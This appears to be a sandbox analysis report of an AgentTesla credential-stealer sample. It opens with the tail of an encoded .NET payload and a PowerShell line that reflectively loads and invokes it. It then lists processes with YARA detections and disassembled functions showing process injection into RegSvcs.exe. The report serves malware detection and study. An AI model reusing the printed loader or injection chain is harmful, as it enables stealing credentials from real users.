AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAAAAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhgAADMAgAAAAAAAAAAAADMAjQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAEAAAAAAAAAAQAAAAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAELAIAAAEAUwB0AHIAaQBuAGcARgBpAGwAZQBJAG4AZgBvAAAACAIAAAEAMAAwADAAMAAwADQAYgAwAAAAGgABAAEAQwBvAG0AbQBlAG4AdABzAAAAAAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAAAAAAAAAAACoAAQABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAAAAAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAxAC4AMAAuADAALgAwAAAANAAKAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABGAGkAYgBlAHIALgBkAGwAbAAAACYAAQABAEwAZQBnAGEAbABDAG8AcAB5AHIAaQBnAGgAdAAAAAAAAAAqAAEAAQBMAGUAZwBhAGwAVAByAGEAZABlAG0AYQByAGsAcwAAAAAAAAAAADwACgABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABGAGkAYgBlAHIALgBkAGwAbAAAACIAAQABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAADAAAALQ0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==');[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] (' ??v?}???@+@ ?@@ ??v?}??.so!}( }4}? ?4*?*?#:?*(+ (*(+ (v.4*?*?#:?sr8*??(su4*?*?#:?4}? ?lo_8*??(garo ??v?}??s4*?*?#:?!}( }il*(+ (up4*?*?#:?4}? ?m. ??v?}??n8*??(r8*??(girf8*??(rkroy4*?*?#:?4*?*?#:??? }??+?sp ??v?}?? ??v?}???*(??@*?'))
                      Imagebase:0x7ff7fbaf0000
                      File size:447488 bytes
                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: SUSP_Reversed_Base64_Encoded_EXE, Description: Detects an base64 encoded executable with reversed characters, Source: 00000001.00000002.317073094.0000028B41F4C000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                      • Rule: SUSP_Reversed_Base64_Encoded_EXE, Description: Detects an base64 encoded executable with reversed characters, Source: 00000001.00000002.311807350.0000028B3235B000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                      • Rule: SUSP_Reversed_Base64_Encoded_EXE, Description: Detects an base64 encoded executable with reversed characters, Source: 00000001.00000002.311807350.0000028B3235F000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                      • Rule: SUSP_Reversed_Base64_Encoded_EXE, Description: Detects an base64 encoded executable with reversed characters, Source: 00000001.00000002.317073094.0000028B41FAD000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                      Reputation:high

                      General

                      Target ID:2
                      Start time:11:39:10
                      Start date:20/03/2023
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7fcd70000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:3
                      Start time:11:39:14
                      Start date:20/03/2023
                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Imagebase:0x7d0000
                      File size:45152 bytes
                      MD5 hash:2867A3817C9245F7CF518524DFD18F28
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.822490552.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.822490552.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:high

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:13.5%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0%
                        Total number of Nodes:20
                        Total number of Limit Nodes:3
                        execution_graph 1881 7ff9a5a72f15 1882 7ff9a5a72f23 Wow64SetThreadContext 1881->1882 1884 7ff9a5a72ff3 1882->1884 1885 7ff9a5a73345 1886 7ff9a5a73353 ResumeThread 1885->1886 1888 7ff9a5a733eb 1886->1888 1889 7ff9a5a72b74 1890 7ff9a5a72bbe CreateProcessW 1889->1890 1893 7ff9a5a72e13 1890->1893 1892 7ff9a5a72e6e 1893->1892 1895 7ff9a5a72ea6 1893->1895 1896 7ff9a5a72ee2 1895->1896 1897 7ff9a5a72ecc 1895->1897 1896->1892 1897->1896 1898 7ff9a5a72fbf Wow64SetThreadContext 1897->1898 1899 7ff9a5a72ff3 1898->1899 1899->1892 1900 7ff9a5a73224 1902 7ff9a5a7322d 1900->1902 1901 7ff9a5a731fe 1902->1901 1903 7ff9a5a732e3 WriteProcessMemory 1902->1903 1904 7ff9a5a73311 1903->1904

                        Callgraph

                        • Executed
                        • Not Executed
                        • Opacity -> Relevance
                        • Disassembly available
                        callgraph 0 Function_00007FF9A5A7028F 1 Function_00007FF9A5A72190 2 Function_00007FF9A5A71810 1->2 3 Function_00007FF9A5A71790 1->3 13 Function_00007FF9A5A71800 1->13 70 Function_00007FF9A5A717A0 1->70 4 Function_00007FF9A5A71090 5 Function_00007FF9A5A7000C 6 Function_00007FF9A5A7168C 7 Function_00007FF9A5A70997 8 Function_00007FF9A5A72097 9 Function_00007FF9A5A70F95 10 Function_00007FF9A5A72F15 11 Function_00007FF9A5A72296 11->2 11->13 11->70 12 Function_00007FF9A5A70B80 14 Function_00007FF9A5B40C2E 15 Function_00007FF9A5A70C07 16 Function_00007FF9A5A71788 17 Function_00007FF9A5A70E85 18 Function_00007FF9A5A71806 19 Function_00007FF9A5A70083 20 Function_00007FF9A5A71283 21 Function_00007FF9A5A71383 22 Function_00007FF9A5A71783 23 Function_00007FF9A5A70C84 24 Function_00007FF9A5A70281 25 Function_00007FF9A5A71081 26 Function_00007FF9A5A72B01 27 Function_00007FF9A5A70070 28 Function_00007FF9A5A717F0 29 Function_00007FF9A5A7186C 29->16 30 Function_00007FF9A5A722E9 30->2 30->13 30->70 31 Function_00007FF9A5A712EA 32 Function_00007FF9A5A723F8 32->2 32->13 33 Function_00007FF9A5A72B74 77 Function_00007FF9A5A72EA6 33->77 34 Function_00007FF9A5A707DF 35 Function_00007FF9A5A7265F 36 Function_00007FF9A5A717E0 37 Function_00007FF9A5A708DD 38 Function_00007FF9A5A723D9 38->2 38->13 39 Function_00007FF9A5A715DA 40 Function_00007FF9A5A717E6 41 Function_00007FF9A5B410D8 42 Function_00007FF9A5A707CF 43 Function_00007FF9A5A70850 44 Function_00007FF9A5A717D0 45 Function_00007FF9A5A7084B 46 Function_00007FF9A5A720C9 46->2 46->3 46->13 46->70 47 Function_00007FF9A5A729C9 47->2 47->13 60 Function_00007FF9A5A717B0 47->60 48 Function_00007FF9A5A700CA 49 Function_00007FF9A5A708D5 50 Function_00007FF9A5B40DE8 51 Function_00007FF9A5B405E5 51->14 52 Function_00007FF9A5A717C0 53 Function_00007FF9A5A7313D 54 Function_00007FF9A5A73345 55 Function_00007FF9A5A701C5 56 Function_00007FF9A5A70EC5 57 Function_00007FF9A5A72B45 58 Function_00007FF9A5A722C6 58->2 58->13 58->70 59 Function_00007FF9A5B40176 61 Function_00007FF9A5A72130 61->2 61->3 61->13 61->70 62 Function_00007FF9A5B40000 63 Function_00007FF9A5A710AB 64 Function_00007FF9A5B4047E 65 Function_00007FF9A5A70FAA 66 Function_00007FF9A5A714AA 67 Function_00007FF9A5B40D04 68 Function_00007FF9A5A708B5 69 Function_00007FF9A5A70EB5 71 Function_00007FF9A5A7149D 72 Function_00007FF9A5A7241D 72->2 72->13 72->60 73 Function_00007FF9A5B4028D 74 Function_00007FF9A5A707A7 75 Function_00007FF9A5A73028 76 Function_00007FF9A5A71AA5 76->16 78 Function_00007FF9A5A73224 79 Function_00007FF9A5B40296 80 Function_00007FF9A5A70421 81 Function_00007FF9A5A70FA2

                        Executed Functions

                        Function 00007FF9A5A720C9 Relevance: 1.7, Strings: 1, Instructions: 458COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 106 7ff9a5a720c9-7ff9a5a720d1 107 7ff9a5a720d3 106->107 108 7ff9a5a720d4-7ff9a5a720e1 106->108 107->108 109 7ff9a5a720e3 108->109 110 7ff9a5a720e4-7ff9a5a7210f 108->110 109->110 112 7ff9a5a72111-7ff9a5a72115 110->112 113 7ff9a5a72117-7ff9a5a7212c 112->113 114 7ff9a5a72171-7ff9a5a72174 112->114 115 7ff9a5a72135-7ff9a5a7214e call 7ff9a5a71790 113->115 114->115 116 7ff9a5a72175-7ff9a5a72184 114->116 118 7ff9a5a72153-7ff9a5a72155 115->118 119 7ff9a5a72157-7ff9a5a72162 118->119 120 7ff9a5a72164-7ff9a5a72167 118->120 119->112 121 7ff9a5a72169-7ff9a5a7216a 120->121 122 7ff9a5a72185-7ff9a5a721a5 120->122 123 7ff9a5a7216e-7ff9a5a7216f 121->123 125 7ff9a5a721a9-7ff9a5a721b9 122->125 126 7ff9a5a721a7 122->126 123->112 125->123 127 7ff9a5a721bb-7ff9a5a721d5 125->127 126->125 129 7ff9a5a7221f-7ff9a5a7226d 127->129 130 7ff9a5a721d7-7ff9a5a7221d 127->130 132 7ff9a5a7226f-7ff9a5a72272 129->132 130->129 133 7ff9a5a722f8-7ff9a5a72311 132->133 134 7ff9a5a72278-7ff9a5a722f3 132->134 138 7ff9a5a72313-7ff9a5a72323 133->138 139 7ff9a5a72ab1-7ff9a5a72ac9 133->139 134->132 150 7ff9a5a72324-7ff9a5a72326 138->150 151 7ff9a5a72331 138->151 144 7ff9a5a72acb-7ff9a5a72ae2 139->144 145 7ff9a5a72b13 139->145 152 7ff9a5a72ae4-7ff9a5a72ae7 144->152 147 7ff9a5a72b51-7ff9a5a72b68 145->147 154 7ff9a5a72330-7ff9a5a72335 150->154 155 7ff9a5a72328-7ff9a5a7232f 150->155 153 7ff9a5a72336-7ff9a5a72338 151->153 152->147 159 7ff9a5a72ae9-7ff9a5a72b09 152->159 157 7ff9a5a7233a-7ff9a5a72353 153->157 158 7ff9a5a72355-7ff9a5a72393 call 7ff9a5a717a0 153->158 154->153 155->153 157->158 164 7ff9a5a72398-7ff9a5a7239a 158->164 168 7ff9a5a72b1e-7ff9a5a72b2b 159->168 169 7ff9a5a72b0b-7ff9a5a72b1c 159->169 166 7ff9a5a723a0-7ff9a5a723b1 164->166 167 7ff9a5a72895-7ff9a5a728b7 164->167 175 7ff9a5a723b3-7ff9a5a723b6 166->175 185 7ff9a5a728bc-7ff9a5a728d7 167->185 176 7ff9a5a72b2d-7ff9a5a72b2e 168->176 177 7ff9a5a72b39-7ff9a5a72b43 168->177 169->152 179 7ff9a5a723bc-7ff9a5a723f6 175->179 180 7ff9a5a72a66-7ff9a5a72a7b call 7ff9a5a71800 175->180 176->177 177->152 179->175 186 7ff9a5a728de-7ff9a5a7292b 180->186 187 7ff9a5a72a81-7ff9a5a72a88 call 7ff9a5a71810 180->187 185->186 186->180 192 7ff9a5a72a8d-7ff9a5a72a90 187->192 192->185 194 7ff9a5a72a96-7ff9a5a72ab0 192->194
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.320735225.00007FF9A5A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5A70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_7ff9a5a70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 6A
                        • API String ID: 0-1903481808
                        • Opcode ID: 485b22fe83af62a5511599c92429a3506c97000d64c1f32b3882a1ddb1ca15af
                        • Instruction ID: 01715c152abb466193d8e12bc9ac84d8568298922c552d8c4529e2e329011871
                        • Opcode Fuzzy Hash: 485b22fe83af62a5511599c92429a3506c97000d64c1f32b3882a1ddb1ca15af
                        • Instruction Fuzzy Hash: 75D13B32B0CA494FE798DB2898412F977E1EF47710F0542BBE44ED7692EE64794287C1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF9A5A72B74 Relevance: 1.8, APIs: 1, Instructions: 339processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.320735225.00007FF9A5A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5A70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_7ff9a5a70000_powershell.jbxd
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: 46ca4856df1c0f561e58178ba35628194878846a7313209239a73b480de6be15
                        • Instruction ID: 1d07b8bafe208d3309ca2e092d7e89b14c1865a932db1b920ecd30d4edaaef4a
                        • Opcode Fuzzy Hash: 46ca4856df1c0f561e58178ba35628194878846a7313209239a73b480de6be15
                        • Instruction Fuzzy Hash: 86C1B17190DB888FDB56DF2888556E8BBF0FF5A310F0442DBD049D7292DB74A985CB82
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF9A5A72EA6 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 202 7ff9a5a72ea6-7ff9a5a72eca 203 7ff9a5a72ecc-7ff9a5a72ee0 202->203 204 7ff9a5a72ee2-7ff9a5a72eea 202->204 203->204 209 7ff9a5a72f41 203->209 206 7ff9a5a72eec-7ff9a5a72efd 204->206 207 7ff9a5a72f03-7ff9a5a72f13 204->207 206->207 211 7ff9a5a72f46-7ff9a5a72fb5 209->211 212 7ff9a5a72f43 209->212 215 7ff9a5a72fbf-7ff9a5a72ff1 Wow64SetThreadContext 211->215 216 7ff9a5a72fb7-7ff9a5a72fbc 211->216 212->211 217 7ff9a5a72ff9-7ff9a5a73020 215->217 218 7ff9a5a72ff3 215->218 216->215 218->217
                        Memory Dump Source
                        • Source File: 00000001.00000002.320735225.00007FF9A5A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5A70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_7ff9a5a70000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9bdbd36372c556be5bdbec19e837655350e406a3a23b674ca4fefdcb4fb606f2
                        • Instruction ID: b9beebd54bc53e7f34b64685a0afbbd129566052c644e4945e51f899bcae5566
                        • Opcode Fuzzy Hash: 9bdbd36372c556be5bdbec19e837655350e406a3a23b674ca4fefdcb4fb606f2
                        • Instruction Fuzzy Hash: 65412531A0CA0C8FEB54DF5898497F97BE0FF96721F04416BE04DC7162EB74A8568B91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF9A5A73224 Relevance: 1.7, APIs: 1, Instructions: 160injectionCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.320735225.00007FF9A5A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5A70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_7ff9a5a70000_powershell.jbxd
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 4a07818e7f8ee39cde7809597378388c6215aaf058b19b74ad07fa08d6f6c1e3
                        • Instruction ID: 3ebc33401ddab75dcbc5ecc3d5d1d6359f588bc4698a0a4c7f46f8c3d1b58039
                        • Opcode Fuzzy Hash: 4a07818e7f8ee39cde7809597378388c6215aaf058b19b74ad07fa08d6f6c1e3
                        • Instruction Fuzzy Hash: FC415B31A0CB488FE718DB18E8067F9BBE4EF56720F04426FD0C9D3152DA6574068B95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF9A5A72F15 Relevance: 1.6, APIs: 1, Instructions: 131threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 235 7ff9a5a72f15-7ff9a5a72f21 236 7ff9a5a72f2c-7ff9a5a72fb5 235->236 237 7ff9a5a72f23-7ff9a5a72f2b 235->237 241 7ff9a5a72fbf-7ff9a5a72ff1 Wow64SetThreadContext 236->241 242 7ff9a5a72fb7-7ff9a5a72fbc 236->242 237->236 243 7ff9a5a72ff9-7ff9a5a73020 241->243 244 7ff9a5a72ff3 241->244 242->241 244->243
                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.320735225.00007FF9A5A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5A70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_7ff9a5a70000_powershell.jbxd
                        Similarity
                        • API ID: ContextThreadWow64
                        • String ID:
                        • API String ID: 983334009-0
                        • Opcode ID: fee273182d0ebac09121b7db78981311560e6747927571d648b67d262d36dd83
                        • Instruction ID: 801f0d3391da5a7ef07a9b5a894ad5258c4bfb64a6883e887637c11ed318d28d
                        • Opcode Fuzzy Hash: fee273182d0ebac09121b7db78981311560e6747927571d648b67d262d36dd83
                        • Instruction Fuzzy Hash: 3441263190C7888FDB56DF6898457E97FE0EF57320F08429BD088C7167DB64A415CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF9A5A73345 Relevance: 1.6, APIs: 1, Instructions: 101threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 245 7ff9a5a73345-7ff9a5a73351 246 7ff9a5a7335c-7ff9a5a733e9 ResumeThread 245->246 247 7ff9a5a73353-7ff9a5a7335b 245->247 250 7ff9a5a733eb 246->250 251 7ff9a5a733f1-7ff9a5a7340d 246->251 247->246 250->251
                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.320735225.00007FF9A5A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5A70000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_7ff9a5a70000_powershell.jbxd
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 308952a13c33eb7526ffd3f2dff325bbfae75550a74fc8bac1bd625052c550fc
                        • Instruction ID: 030f60f72dd536a300fc3ff15d437d4649c4f914c7565d0c44ecbe3fa18a6ef9
                        • Opcode Fuzzy Hash: 308952a13c33eb7526ffd3f2dff325bbfae75550a74fc8bac1bd625052c550fc
                        • Instruction Fuzzy Hash: E521E331A0CA4C8FDB59DF689845BA97BE0FF56321F04426FC049D3692DB70A415CB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF9A5B40C2E Relevance: .7, Instructions: 685COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 337 7ff9a5b40c2e-7ff9a5b40c53 339 7ff9a5b40d5c-7ff9a5b40d66 337->339 340 7ff9a5b40c59-7ff9a5b40c66 337->340 343 7ff9a5b40d68-7ff9a5b40d74 339->343 344 7ff9a5b40d75-7ff9a5b40db5 339->344 341 7ff9a5b40c6c-7ff9a5b40c76 340->341 342 7ff9a5b40db8-7ff9a5b40dc5 340->342 345 7ff9a5b40c90-7ff9a5b40ca0 341->345 346 7ff9a5b40c78-7ff9a5b40c8e 341->346 351 7ff9a5b40dcd 342->351 352 7ff9a5b40dc7 342->352 344->342 353 7ff9a5b40cad-7ff9a5b40cc2 345->353 354 7ff9a5b40ca2-7ff9a5b40cab 345->354 346->345 356 7ff9a5b40dcf 351->356 357 7ff9a5b40dd1-7ff9a5b40e10 351->357 352->351 353->342 363 7ff9a5b40cc8-7ff9a5b40cd2 353->363 354->353 356->357 359 7ff9a5b40e11-7ff9a5b40e5f 356->359 357->359 369 7ff9a5b40ff8-7ff9a5b410a5 359->369 370 7ff9a5b40e65-7ff9a5b40e6f 359->370 365 7ff9a5b40ceb-7ff9a5b40d03 363->365 366 7ff9a5b40cd4-7ff9a5b40ce1 363->366 366->365 371 7ff9a5b40ce3-7ff9a5b40ce9 366->371 420 7ff9a5b410b1-7ff9a5b410bd 369->420 421 7ff9a5b410a7-7ff9a5b410ad 369->421 372 7ff9a5b40e89-7ff9a5b40e8f 370->372 373 7ff9a5b40e71-7ff9a5b40e7f 370->373 371->365 374 7ff9a5b40f8d-7ff9a5b40f97 372->374 375 7ff9a5b40e95-7ff9a5b40e98 372->375 373->372 382 7ff9a5b40e81-7ff9a5b40e87 373->382 383 7ff9a5b40faa-7ff9a5b40ff5 374->383 384 7ff9a5b40f99-7ff9a5b40fa9 374->384 378 7ff9a5b40e9a-7ff9a5b40ead 375->378 379 7ff9a5b40ee1 375->379 378->369 392 7ff9a5b40eb3-7ff9a5b40ebd 378->392 385 7ff9a5b40ee3-7ff9a5b40ee5 379->385 382->372 383->369 385->374 389 7ff9a5b40eeb-7ff9a5b40eee 385->389 389->374 394 7ff9a5b40ef4-7ff9a5b40ef7 389->394 395 7ff9a5b40ebf-7ff9a5b40ed4 392->395 396 7ff9a5b40ed6-7ff9a5b40edc 392->396 394->374 398 7ff9a5b40efd-7ff9a5b40f34 394->398 395->396 401 7ff9a5b40edd-7ff9a5b40edf 396->401 398->401 410 7ff9a5b40f36-7ff9a5b40f3a 398->410 401->385 410->374 412 7ff9a5b40f3c-7ff9a5b40f42 410->412 413 7ff9a5b40f44-7ff9a5b40f5f 412->413 414 7ff9a5b40f61-7ff9a5b40f77 412->414 413->414 417 7ff9a5b40f7d-7ff9a5b40f8c 414->417 422 7ff9a5b410c9-7ff9a5b410e0 420->422 423 7ff9a5b410bf-7ff9a5b410c5 420->423 421->420 424 7ff9a5b4110a-7ff9a5b41144 422->424 425 7ff9a5b410e2-7ff9a5b41108 422->425 423->422 427 7ff9a5b4118b-7ff9a5b41195 424->427 428 7ff9a5b41146-7ff9a5b41188 424->428 425->424 430 7ff9a5b411a0-7ff9a5b411eb 427->430 431 7ff9a5b41197-7ff9a5b4119f 427->431 428->427
                        Memory Dump Source
                        • Source File: 00000001.00000002.320939280.00007FF9A5B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5B40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_7ff9a5b40000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1d57cda65a0e0d86b7012c2be30550599eb2931c82316a7265e58a1b436af66d
                        • Instruction ID: 59de08293c8c762bb2a391d539e976f1921f29882e98300ea395acc258d024a9
                        • Opcode Fuzzy Hash: 1d57cda65a0e0d86b7012c2be30550599eb2931c82316a7265e58a1b436af66d
                        • Instruction Fuzzy Hash: D4123522A0EB894FE7A6D72C58556B57FF1EF87611B0801FBD08DCB193D959BC068382
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF9A5B40DE8 Relevance: .2, Instructions: 198COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 439 7ff9a5b40de8-7ff9a5b40e5f 443 7ff9a5b40ff8-7ff9a5b410a5 439->443 444 7ff9a5b40e65-7ff9a5b40e6f 439->444 492 7ff9a5b410b1-7ff9a5b410bd 443->492 493 7ff9a5b410a7-7ff9a5b410ad 443->493 445 7ff9a5b40e89-7ff9a5b40e8f 444->445 446 7ff9a5b40e71-7ff9a5b40e7f 444->446 447 7ff9a5b40f8d-7ff9a5b40f97 445->447 448 7ff9a5b40e95-7ff9a5b40e98 445->448 446->445 454 7ff9a5b40e81-7ff9a5b40e87 446->454 455 7ff9a5b40faa-7ff9a5b40ff5 447->455 456 7ff9a5b40f99-7ff9a5b40fa9 447->456 451 7ff9a5b40e9a-7ff9a5b40ead 448->451 452 7ff9a5b40ee1 448->452 451->443 464 7ff9a5b40eb3-7ff9a5b40ebd 451->464 457 7ff9a5b40ee3-7ff9a5b40ee5 452->457 454->445 455->443 457->447 461 7ff9a5b40eeb-7ff9a5b40eee 457->461 461->447 466 7ff9a5b40ef4-7ff9a5b40ef7 461->466 467 7ff9a5b40ebf-7ff9a5b40ed4 464->467 468 7ff9a5b40ed6-7ff9a5b40edc 464->468 466->447 470 7ff9a5b40efd-7ff9a5b40f34 466->470 467->468 473 7ff9a5b40edd-7ff9a5b40edf 468->473 470->473 482 7ff9a5b40f36-7ff9a5b40f3a 470->482 473->457 482->447 484 7ff9a5b40f3c-7ff9a5b40f42 482->484 485 7ff9a5b40f44-7ff9a5b40f5f 484->485 486 7ff9a5b40f61-7ff9a5b40f77 484->486 485->486 489 7ff9a5b40f7d-7ff9a5b40f8c 486->489 494 7ff9a5b410c9-7ff9a5b410e0 492->494 495 7ff9a5b410bf-7ff9a5b410c5 492->495 493->492 496 7ff9a5b4110a-7ff9a5b41144 494->496 497 7ff9a5b410e2-7ff9a5b41108 494->497 495->494 499 7ff9a5b4118b-7ff9a5b41195 496->499 500 7ff9a5b41146-7ff9a5b41188 496->500 497->496 502 7ff9a5b411a0-7ff9a5b411eb 499->502 503 7ff9a5b41197-7ff9a5b4119f 499->503 500->499
                        Memory Dump Source
                        • Source File: 00000001.00000002.320939280.00007FF9A5B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5B40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_7ff9a5b40000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1fcab1d9441759e938a2673e806926ec4f14eab9e36950191c213b3e7949f5fe
                        • Instruction ID: a3623e708b8e2225aadae6192cfb155cfe78142543cc843a5ab3e5fe9958af46
                        • Opcode Fuzzy Hash: 1fcab1d9441759e938a2673e806926ec4f14eab9e36950191c213b3e7949f5fe
                        • Instruction Fuzzy Hash: 4D512632E1EF8A4FEBB5CB1858516757BE1EF87611B4842BAC48CCB193D954BC068781
                        Uniqueness

                        Uniqueness Score: -1.00%

